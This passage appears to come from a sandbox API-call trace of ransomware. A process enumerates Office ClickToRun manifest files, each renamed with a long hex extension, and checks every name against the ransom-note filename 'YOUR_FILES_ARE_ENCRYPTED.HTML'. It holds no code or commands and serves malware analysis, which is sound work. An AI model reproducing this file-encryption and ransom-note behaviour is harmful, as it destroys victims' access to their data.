(pszPath="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" [0169.632] lstrlenW (lpString=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned 65 [0169.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb572740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41", cAlternateFileName="C2RMAN~1.828")) returned 1 [0169.632] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned 189 [0169.632] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.632] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" [0169.633] lstrlenW (lpString=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb7adbe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D", cAlternateFileName="C2RMAN~1.F59")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned 200 [0169.633] lstrcmpW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" [0169.633] lstrlenW (lpString=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dfd4f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dfd4f0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb6ef500, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B", cAlternateFileName="C2RMAN~1.169")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned 187 [0169.633] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" [0169.633] lstrlenW (lpString=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb60acc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359", cAlternateFileName="C2RMAN~1.563")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned 192 [0169.633] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW 
(pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" [0169.633] lstrlenW (lpString=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb715660, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233", cAlternateFileName="C2RMAN~1.571")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned 183 [0169.633] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" [0169.633] lstrlenW (lpString=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb73b7c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36", cAlternateFileName="C2RMAN~1.37D")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned 196 [0169.633] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" [0169.633] lstrlenW (lpString=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb761920, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927", cAlternateFileName="C2RMAN~1.4F8")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned 185 [0169.633] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" [0169.634] lstrlenW (lpString=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb761920, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B", cAlternateFileName="C2RMAN~1.8C7")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned 200 [0169.634] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW 
(pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" [0169.634] lstrlenW (lpString=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb630e20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E", cAlternateFileName="C2RMAN~1.51B")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned 187 [0169.634] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" [0169.634] lstrlenW (lpString=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb656f80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B", cAlternateFileName="C2RMAN~1.741")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned 206 [0169.634] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" [0169.634] lstrlenW (lpString=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d3ee10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d3ee10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb7d3d40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035", cAlternateFileName="C2RMAN~1.655")) returned 1 [0169.634] wnsprintfW (in: 
pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned 206 [0169.634] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" [0169.634] lstrlenW (lpString=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb846160, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x684e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854", cAlternateFileName="C2RMAN~1.C7E")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned 190 [0169.634] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
-1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" [0169.634] lstrlenW (lpString=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb846160, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00", cAlternateFileName="C2RMAN~1.B98")) returned 1 [0169.635] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned 190 [0169.635] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.635] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" [0169.635] lstrlenW (lpString=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb86c2c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76", cAlternateFileName="C2RMAN~1.53C")) returned 1 [0169.635] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned 190 [0169.635] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.635] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" [0169.635] lstrlenW (lpString=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb892420, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A", cAlternateFileName="C2RMAN~1.CFB")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned 190 [0169.636] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" [0169.636] lstrlenW (lpString=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb8b8580, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B", cAlternateFileName="C2RMAN~1.CF7")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 